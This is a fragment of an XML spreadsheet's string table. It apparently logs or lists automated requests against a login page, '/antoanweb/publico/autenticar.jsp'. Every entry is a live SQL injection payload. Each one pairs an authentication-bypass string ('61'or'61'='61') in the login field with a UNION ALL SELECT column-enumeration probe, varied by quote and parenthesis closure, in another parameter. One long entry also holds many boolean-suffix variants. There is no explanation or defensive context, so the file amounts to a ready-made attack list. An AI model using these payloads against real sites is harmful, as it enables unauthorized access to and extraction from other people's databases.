    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477--and((("wswj"="wswj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539,6539--and((("ecfz"="ecfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035,1035--and"zgma"="zgma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801,8801--and"bjul"="bjul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153--and"fszd"="fszd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024,4024--and"naha"="naha&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249--and"hfez"="hfez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276,9276--and"txqc"="txqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976,5976--and"xvdy"="xvdy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378,6378--and"qpje"="qpje&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298,8298--and"femq"="femq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028,8028--and"ylot"="ylot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379,9379--and("vefm"like"vefm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736--and("xjqp"like"xjqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915--and("fuvo"like"fuvo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921--and("mape"like"mape&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851,9851--and("dphm"like"dphm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995,2995--and("igvb"like"igvb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405--and("izfe"like"izfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571--and("psbz"like"psbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579,4579--and("hbwc"like"hbwc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843,7843--and("lmsh"like"lmsh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497,2497--and(("pvvy"like"pvvy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956,8956--and(("lpxs"like"lpxs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094,9094--and(("ayre"like"ayre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990,4990--and(("dtfd"like"dtfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125--and(("tjev"like"tjev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156,9156--and(("cabv"like"cabv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941,5941--and(("tpoi"like"tpoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668--and(("jwnv"like"jwnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344,5344--and(("zxmx"like"zxmx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830,6830--and(("vmeb"like"vmeb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675,2675--and((("ygdu"like"ygdu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347,347--and((("lwap"like"lwap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162,9162--and((("aoik"like"aoik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756,9756--and((("rqjv"like"rqjv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972--and((("vlzv"like"vlzv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115,9115--and((("smdo"like"smdo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593,9593--and((("reqz"like"reqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463,7463--and((("rrfe"like"rrfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320,320--and((("ieja"like"ieja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996--and((("hbmd"like"hbmd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077,4077--and"boxp"like"boxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341,4341--and"gvyg"like"gvyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777,4777--and"cfgs"like"cfgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893,9893--and"crwh"like"crwh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183,6183--and"ykxb"like"ykxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542,7542--and"kxrg"like"kxrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932,1932--and"jnmm"like"jnmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051--and"xloc"like"xloc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32--and"zods"like"zods&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494,2494--and"mzid"like"mzid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--and(5316=5316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--and(3982=3982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--and(1945=1945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--and(1814=1814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--and(4469=4469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--and(9399=9399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--and(4249=4249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--and(8087=8087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--and(1139=1139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--and(1168=1168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--and((3279=3279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--and((7638=7638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--and((7711=7711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--and((2750=2750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--and((6696=6696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--and((4307=4307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--and((5208=5208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--and((2478=2478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--and((4410=4410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--and((7574=7574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--and(((3214=3214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--and(((183=183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--and(((6753=6753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--and(((5393=5393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--and(((758=758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--and(((5794=5794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--and(((8079=8079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--and(((752=752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--and(((9581=9581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--and(((7870=7870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--and('wazw'='wazw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--and('gtnw'='gtnw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--and('gram'='gram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--and('fmxn'='fmxn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--and('mjui'='mjui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--and('jatm'='jatm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--and('xzaz'='xzaz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--and('rhoj'='rhoj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--and('ywoo'='ywoo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--and('ribf'='ribf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--and(('ecuh'='ecuh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--and(('rdoy'='rdoy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--and(('gamj'='gamj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--and(('rwne'='rwne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--and(('fvqi'='fvqi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--and(('vvqe'='vvqe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--and(('tssn'='tssn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--and(('jkyp'='jkyp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--and(('aesj'='aesj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--and(('rnuj'='rnuj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--and((('gfqz'='gfqz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--and((('jatf'='jatf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--and((('omjt'='omjt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--and((('qcqu'='qcqu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--and((('rhjr'='rhjr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--and((('xvmv'='xvmv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--and((('cgjz'='cgjz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--and((('qfnd'='qfnd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--and((('eouo'='eouo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--and((('zywh'='zywh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--and'uewg'='uewg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--and'sapw'='sapw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--and'arkh'='arkh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--and'oyee'='oyee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--and'rxwo'='rxwo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--and'vkou'='vkou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--and'ocur'='ocur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--and'sfmh'='sfmh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--and'jfos'='jfos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--and'ilms'='ilms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--and('bclr'like'bclr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--and('fike'like'fike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--and('jyat'like'jyat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--and('fipk'like'fipk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--and('jacp'like'jacp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--and('ncau'like'ncau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--and('wald'like'wald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--and('mfso'like'mfso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--and('wrqn'like'wrqn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--and('rkyg'like'rkyg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--and(('kvoz'like'kvoz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--and(('coxa'like'coxa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--and(('iuuu'like'iuuu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--and(('rpik'like'rpik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--and(('mxty'like'mxty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--and(('jdrf'like'jdrf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--and(('vjxj'like'vjxj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--and(('wafv'like'wafv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--and(('bjew'like'bjew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--and(('atlt'like'atlt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--and((('heoa'like'heoa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--and((('ehlw'like'ehlw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--and((('lmmw'like'lmmw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--and((('vpjm'like'vpjm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--and((('nwcu'like'nwcu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--and((('kmju'like'kmju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--and((('jfex'like'jfex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--and((('khiv'like'khiv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--and((('jfbk'like'jfbk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--and((('gaap'like'gaap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--and'cpem'like'cpem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--and'cjvr'like'cjvr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--and'bhma'like'bhma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--and'qmbd'like'qmbd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--and'pfod'like'pfod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--and'meui'like'meui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--and'pwch'like'pwch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--and'zhzu'like'zhzu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--and'xjvn'like'xjvn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--and'lsqj'like'lsqj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--and("cpdg"="cpdg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--and("nilo"="nilo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--and("qihs"="qih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--and("ljzu"="ljzu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--and("awsv"="awsv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--and("sqfv"="sqfv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--and("ckvv"="ckvv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--and("aljv"="aljv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--and("cshl"="cshl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--and("yyzs"="yyzs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--and(("rlvf"="rlvf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--and(("jmqc"="jmqc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--and(("ybwi"="ybwi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--and(("czzv"="czzv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--and(("slyh"="slyh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--and(("qknd"="qknd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--and(("dwhl"="dwhl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--and(("srvx"="srvx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--and(("eprv"="eprv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--and(("skrv"="skrv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--and((("xosf"="xosf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--and((("dgyz"="dgyz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--and((("eogh"="eogh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--and((("iaww"="iaww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--and((("oeug"="oeug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--and((("cjdh"="cjdh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--and((("bopg"="bopg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--and((("buyi"="buyi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--and((("igqq"="igqq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--and((("socg"="socg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--and"luad"="luad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--and"knuo"="knuo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--and"smpw"="smpw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--and"cira"="cira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--and"tfbk"="tfbk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--and"piwi"="piwi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--and"betk"="betk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--and"sphw"="sphw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--and"mamt"="mamt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--and"vyaw"="vyaw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--and("jngj"like"jngj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--and("ipiv"like"ipiv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--and("qxww"like"qxww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--and("jidb"like"jidb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--and("ctkh"like"ctkh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--and("mfuj"like"mfuj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--and("mgdx"like"mgdx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--and("coia"like"coia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--and("nfnz"like"nfnz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--and("xopl"like"xopl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--and(("mzdk"like"mzdk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--and(("yuvm"like"yuvm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--and(("ozsz"like"ozsz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--and(("ncrr"like"ncrr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--and(("wsxq"like"wsxq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--and(("ohva"like"ohva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--and(("gbmn"like"gbmn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--and(("gkox"like"gkox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--and(("tcuu"like"tcuu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--and(("dfvc"like"dfvc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--and((("efsu"like"efsu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--and((("bswq"like"bswq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--and((("vblw"like"vblw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--and((("uoxz"like"uoxz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--and((("phah"like"phah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--and((("tnjj"like"tnjj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--and((("zcch"like"zcch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--and((("pqpm"like"pqpm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--and((("ojnl"like"ojnl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--and((("nhoq"like"nhoq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--and"xbnd"like"xbnd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--and"uvxj"like"uvxj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--and"jmet"like"jmet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--and"xsfr"like"xsfr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--and"eazz"like"eazz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--and"zilj"like"zilj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--and"vvef"like"vvef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--and"uegr"like"uegr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--and"rqoc"like"rqoc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--and"qwvd"like"qwvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335,335--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793,6793--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091,2091--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094,6094--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366,5366--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722,3722--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540,8540--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346,2346--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259,3259--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605,605--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463,6463--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716,9716--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425,1425--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651,3651--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443,7443--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861,7861--&amp;modo=entrar</t>
  </si>
  <si>
